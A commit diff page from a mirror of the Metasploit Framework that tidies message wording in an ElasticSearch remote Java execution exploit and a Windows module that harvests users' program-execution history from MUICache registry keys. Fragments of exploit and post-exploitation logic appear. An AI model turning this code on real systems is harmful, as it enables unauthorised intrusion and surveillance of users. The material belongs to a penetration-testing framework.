infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Make print/descs/case consistent

bug/bundler_fix
Tod Beardsley 2014-06-02 13:20:01 -05:00
parent b7dc89f569
commit ea383b4139
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
2 changed files with 26 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
modules/exploits/multi/elasticsearch/script_mvel_rce.rb
View File

@ -15,10 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution', 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
'Description' => %q{ 'Description' => %q{
This module exploits a remote command execution vulnerability in ElasticSearch, This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
REST API, which requires no authentication or authorization, where the search REST API, which does not require authentication, where the search
function allows dynamic scripts execution, and can be used for remote attackers function allows dynamic scripts execution. It can be used for remote attackers
to execute arbitrary Java code. This module has been tested successfully on to execute arbitrary Java code. This module has been tested successfully on
ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
}, },
@ -65,29 +65,30 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
print_status("#{peer} - Trying to execute arbitrary Java..") print_status("#{peer} - Trying to execute arbitrary Java...")
unless vulnerable? unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
end end
print_status("#{peer} - Asking remote OS...") print_status("#{peer} - Discovering remote OS...")
res = execute(java_os) res = execute(java_os)
result = parse_result(res) result = parse_result(res)
if result.nil? if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...") fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
else else
print_good("#{peer} - OS #{result} found") # TODO: It'd be nice to report_host() with this info.
print_good("#{peer} - Remote OS is '#{result}' ")
end end
jar_file = "" jar_file = ""
if result =~ /win/i if result =~ /win/i
print_status("#{peer} - Asking TEMP path") print_status("#{peer} - Discovering TEMP path")
res = execute(java_tmp_dir) res = execute(java_tmp_dir)
result = parse_result(res) result = parse_result(res)
if result.nil? if result.nil?
fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...") fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
else else
print_good("#{peer} - TEMP path found on #{result}") print_good("#{peer} - TEMP path identified: '#{result}' ")
end end
jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
else else

30
modules/post/windows/gather/enum_muicache.rb
View File

@ -18,7 +18,7 @@ class Metasploit3 < Msf::Post
'Description' => 'Description' =>
%q{ %q{
This module gathers information about the files and file paths that logged on users have This module gathers information about the files and file paths that logged on users have
executed on the system. It also will check if the file exists on the system still. This executed on the system. It also will check if the file still exists on the system. This
information is gathered by using information stored under the MUICache registry key. If information is gathered by using information stored under the MUICache registry key. If
the user is logged in when the module is executed it will collect the MUICache entries the user is logged in when the module is executed it will collect the MUICache entries
by accessing the registry directly. If the user is not logged in the module will download by accessing the registry directly. If the user is not logged in the module will download
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList" username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList"
profile_subkeys = registry_enumkeys(username_reg_path) profile_subkeys = registry_enumkeys(username_reg_path)
if profile_subkeys.blank? if profile_subkeys.blank?
print_error("Unable to access ProfileList registry key. Can't continue.") print_error("Unable to access ProfileList registry key. Unable to continue.")
return nil return nil
end end
@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post
end end
user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath") user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath")
if user_home_path.blank? if user_home_path.blank?
print_error("Unable to read ProfileImagePath from the registry. Can't continue.") print_error("Unable to read ProfileImagePath from the registry. Unable to continue.")
return nil return nil
end end
full_path = user_home_path.strip full_path = user_home_path.strip
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Post
# If the registry_enumvals returns us nothing then we'll know # If the registry_enumvals returns us nothing then we'll know
# that the user is most likely not logged in and we'll need to # that the user is most likely not logged in and we'll need to
# download and process users hive locally. # download and process users hive locally.
print_warning("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") print_warning("User #{user}: Can't access registry. Maybe the user is not logged in? Trying NTUSER.DAT/USRCLASS.DAT...")
result = process_hive(sys_path, user, muicache, hive_file) result = process_hive(sys_path, user, muicache, hive_file)
unless result.nil? unless result.nil?
result.each { |r| result.each { |r|
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post
# If the registry_enumvals returns us content we'll know that we # If the registry_enumvals returns us content we'll know that we
# can access the registry directly and thus continue to process # can access the registry directly and thus continue to process
# the content collected from there. # the content collected from there.
print_status("User #{user}: Enumerating registry..") print_status("User #{user}: Enumerating registry...")
subkeys.each do |key| subkeys.each do |key|
if key[0] != "@" && key != "LangID" && !key.nil? if key[0] != "@" && key != "LangID" && !key.nil?
result = check_file_exists(key, user) result = check_file_exists(key, user)
@ -142,11 +142,11 @@ class Metasploit3 < Msf::Post
ntuser_status = file_exist?(hive_path) ntuser_status = file_exist?(hive_path)
unless ntuser_status == true unless ntuser_status == true
print_warning("Couldn't locate/download #{user}'s registry hive. Can't proceed.") print_warning("Couldn't locate/download #{user}'s registry hive. Unable to proceed.")
return nil return nil
end end
print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file...")
local_hive_copy = Rex::Quickfile.new("jtrtmp") local_hive_copy = Rex::Quickfile.new("jtrtmp")
local_hive_copy.close local_hive_copy.close
begin begin
@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post
# extracting the contents of the MUICache registry key. # extracting the contents of the MUICache registry key.
def hive_parser(local_hive_copy, muicache, user) def hive_parser(local_hive_copy, muicache, user)
results = [] results = []
print_status("Parsing registry content..") print_status("Parsing registry content...")
err_msg = "Error parsing hive. Can't continue." err_msg = "Error parsing hive. Unable to continue."
hive = Rex::Registry::Hive.new(local_hive_copy) hive = Rex::Registry::Hive.new(local_hive_copy)
if hive.nil? if hive.nil?
print_error(err_msg) print_error(err_msg)
@ -210,7 +210,7 @@ class Metasploit3 < Msf::Post
# - http://forensicartifacts.com/2010/08/registry-muicache/ # - http://forensicartifacts.com/2010/08/registry-muicache/
# - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots
def run def run
print_status("Starting to enumerate MuiCache registry keys..") print_status("Starting to enumerate MUICache registry keys...")
sys_info = sysinfo['OS'] sys_info = sysinfo['OS']
if sys_info =~/Windows XP/ && is_admin? if sys_info =~/Windows XP/ && is_admin?
@ -219,7 +219,7 @@ class Metasploit3 < Msf::Post
hive_file = "\\NTUSER.DAT" hive_file = "\\NTUSER.DAT"
elsif sys_info =~/Windows 7/ && is_admin? elsif sys_info =~/Windows 7/ && is_admin?
print_good("Remote system supported: #{sys_info}") print_good("Remote system supported: #{sys_info}")
muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache" muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MUICache"
hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat"
else else
print_error("Unsupported OS or not enough privileges. Unable to continue.") print_error("Unsupported OS or not enough privileges. Unable to continue.")
@ -236,7 +236,7 @@ class Metasploit3 < Msf::Post
"File status", "File status",
]) ])
print_status("Phase 1: Searching user names..") print_status("Phase 1: Searching user names...")
sys_users, sys_paths, sys_sids = find_user_names sys_users, sys_paths, sys_sids = find_user_names
if sys_users.blank? if sys_users.blank?
@ -246,16 +246,16 @@ class Metasploit3 < Msf::Post
print_good("Users found: #{sys_users.join(", ")}") print_good("Users found: #{sys_users.join(", ")}")
end end
print_status("Phase 2: Searching registry hives..") print_status("Phase 2: Searching registry hives...")
muicache_reg_keys = enum_muicache_paths(sys_sids, muicache) muicache_reg_keys = enum_muicache_paths(sys_sids, muicache)
results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file) results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file)
results.each { |r| table << r } results.each { |r| table << r }
print_status("Phase 3: Processing results..") print_status("Phase 3: Processing results...")
loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information") loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information")
print_line("\n" + table.to_s + "\n") print_line("\n" + table.to_s + "\n")
print_status("Results stored in: #{loot}") print_status("Results stored as: #{loot}")
print_status("Execution finished.") print_status("Execution finished.")
end end